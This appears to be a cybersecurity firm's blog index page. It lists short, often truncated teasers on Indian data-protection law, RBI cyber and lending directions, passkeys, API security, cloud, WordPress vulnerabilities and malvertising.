Application Programming Interface or API serves as a data connection that facilitates the sharing of data with other applications. In today's rapidly evolving digital landscape,
Lok Sabha passed the Digital Personal Data Protection Act – India (DPDP Act) - August 2023 , India’s 2nd attempt in framing a privacy legislation.Aug 2017: Privacy as a fundamental right reaffirmed in Justice KS Puttaswamy vs Union of India by SC Justice Srikrishna Committee constituted to examine data
The Reserve Bank of India (RBI) has introduced a draft master direction that covers various domains of cyber resilience and digital payment security.
Passkeys are a significant improvement over passwords. They are faster, more secure, and more convenient. Many brands will follow in supporting passkeys. I expect passkeys to become the standard for login security in the near future like how 2FA was adopted in the past.
The cybersecurity landscape is constantly evolving, and CISOs need to be prepared to defend against increasingly sophisticated attacks.
Regulated Entities (Res) outsource a substantial portion of their IT activities to third parties, which exposes them to various risks. RBI released a finalized version of Master Direction on Outsourcing of Information Technology Services on April 10, 2023.
Portfolio managers work closely with their clients to understand their financial goals, risk tolerance, and investment preferences.
The GISEC 2023 event is scheduled to be held in Dubai World Trade Center, United Arab Emirates, on 14, 2023 to March 16, 2023.
The RBI announced the launch of the first pilot for retail digital Rupee (e₹-R) on December 01, 2022. It has commenced the pilot in the wholesale segment from November 2022.
An Account Aggregator shall transmit the financial data pertaining to the user only after receiving formal consent from the user
APIs are the backbone of the internet, powering the applications and services that we use every day
In order to protect your business from common cybersecurity threats, it is important to be aware of the different types of attacks that exist and how to prevent them
Read what RBI has to say on digital lending in the Guideline on Digital Lending issued on 2nd September 2022
The concept of BNPL is similar to that of credit cards wherein a consumer makes a purchase through a credit line and the payment is done later
Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc.
Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible.
Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security
With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts
Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional
According to the statistics 73.2% of the most popular WordPress installations are vulnerable till date. These can be identified using automated tools and can be exploited.
Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. The blockchain contains a list of records or blocks which are linked using
Malvertisements are a malicious advertisement distributed in the same was as a legitimate online advertisement. It is one of the common practices to use spread malware.
CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor and to be mentored to achieve our client’s goals.
